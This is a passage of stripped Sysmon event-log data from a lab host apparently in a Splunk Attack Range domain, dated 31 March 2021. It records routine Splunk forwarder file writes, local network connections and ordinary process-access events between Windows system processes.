AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53615-false52.242.101.226-443https 23542300x80000000000000008954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:47.244{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=515DBB5213D6EBD3B176673C7141A027,SHA256=C8D1974E875258A5D822D70129570E75161301BC05C4BEBAB003D3CDD8518B71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:47.010{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=4A472B7200B21CFC9FC944B7F40C66D2,SHA256=2AA100BA4A6821F985D35FF918F14D6958F92502EA249C52E355EFB8458880C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:47.010{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=E42F386D05210F26CCC3F384248FD8D1,SHA256=2C05F0A2754FD0F5CFA9117B5A5A720AD2B34A2784AFAC5F1DC2478F93628AE5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.995{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.995{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.995{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.995{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.995{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.995{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:46.995{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000008959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:47.936{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53617-false10.0.1.12-8089- 354300x80000000000000008958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:47.925{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53616-false10.0.1.12-8089- 23542300x80000000000000008957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:48.633{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=4A472B7200B21CFC9FC944B7F40C66D2,SHA256=2AA100BA4A6821F985D35FF918F14D6958F92502EA249C52E355EFB8458880C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:48.258{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB1A7AFDCFBD13461B8372F2921F35DE,SHA256=C5F6407768A1E56E1C5EB18FC07961DC918B86F9695C4CFC2C2B2FD845C3B437,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:49.257{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE044ADA741CA4DBB18235518350110D,SHA256=16E82C76199694B042EBAAA12047417789DA4F3921C2ABC4C1CCFD4E79A3E2D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:50.271{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE2E444C9AC6C6AF83FFCC1286EF4945,SHA256=D9B242B96DF4D85F2C741D44D9D2F64F82AF0207D5D45BE234AEBDE45DAF2912,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:51.316{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF5A5EF3E688ACD00DE4C7FF25C7B849,SHA256=9429638464B9D28E516AA678F5E13FF6BFD4B1D4F6B85D50B3C9787D35EC6365,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000008962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:49.432{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53618-false10.0.1.12-8000- 23542300x80000000000000008964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:52.330{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD394192122DE45276A275EAB38AE760,SHA256=424A35A9B4820BAB3FA4A3FF9BBF871A1CB30A71952819F0E3271F2ED9D066EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:53.344{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A76B60766883B7002E0553058EE642D,SHA256=E04B190443CC8EBAED0308341BA80E2BB1459B885A15E30CC92CC127C92B35D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:54.374{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE42BDE98C7619CBF1DF40A518D123EE,SHA256=6A228E629165BFB6C69C18F7E9CA6A619A14436EABBA1BB9EF4EE71FD3B99CB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:55.388{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70DA2C550D230A3B247EA2BE721A359B,SHA256=723D03CD7D8EF22C88FB8355545DDD05B95FE6A9EF05ECCD3574DEFE9A2CDCC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:56.402{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39D1F41683EB913992A6E7F2FDA9A5C1,SHA256=FE4321EE24D34D2312EF7C24505366C3C6769F694295641B9870218F32329189,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:57.416{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D5C0DEC21FEDCB6AF8A3E5DE91328EE,SHA256=EFF76DFFC06F168085CDC16CE500571E31A38CE95A5C29C1697C66E05D4233E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000008969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:55.370{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53619-false10.0.1.12-8000- 23542300x80000000000000008971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:58.477{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BACF4C79D81DBCE51FECDEB279D1146F,SHA256=0283CC092F9B04BCB760A730E990EF23CBAD7428C33B20B03A0BABBD5E9F45F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:59.507{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF779CF35DA177840AAA79EE5BAC5298,SHA256=6DFDFEA44A3F2D06AA77A2BF6DBCB846DE5A6891B761F56F6F30BF8F5AB5CB3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:00.521{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC7812B9A5108D019A3C15094E8CFA89,SHA256=4FE6FEA1D8E50C0D7D6D16A8714DAB0BDE290FE45CC71F6C5FD27D9C3CF2E276,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:01.988{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000008975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:01.988{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x80000000000000008974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:01.535{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BD076B7D57D9A68C3F730F14F0D34BD,SHA256=DBC9FFDF214D6C00130E303B6AEA45497D201B9813A17B799F4655E988C67DB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:02.627{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1307B53AC95F73E077646A4224F73B0A,SHA256=285B5406BC833DB4169AD33F73D8DAF4BF5F2F460D62A0C3CE2A58770FAF988E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000008979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:00.526{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53620-false10.0.1.12-8000- 10341000x80000000000000008978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:02.035{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000008977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:02.035{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x80000000000000008989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:03.626{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B16D549515CF7BB7ABE9DF30BB73127A,SHA256=93EAF4EE09B0484A819615976CB7D096829C85732606B466CB7B7D5242D931FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:03.049{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6533-6064-1D01-00000000AE01}6452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:03.049{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:03.049{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:03.049{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 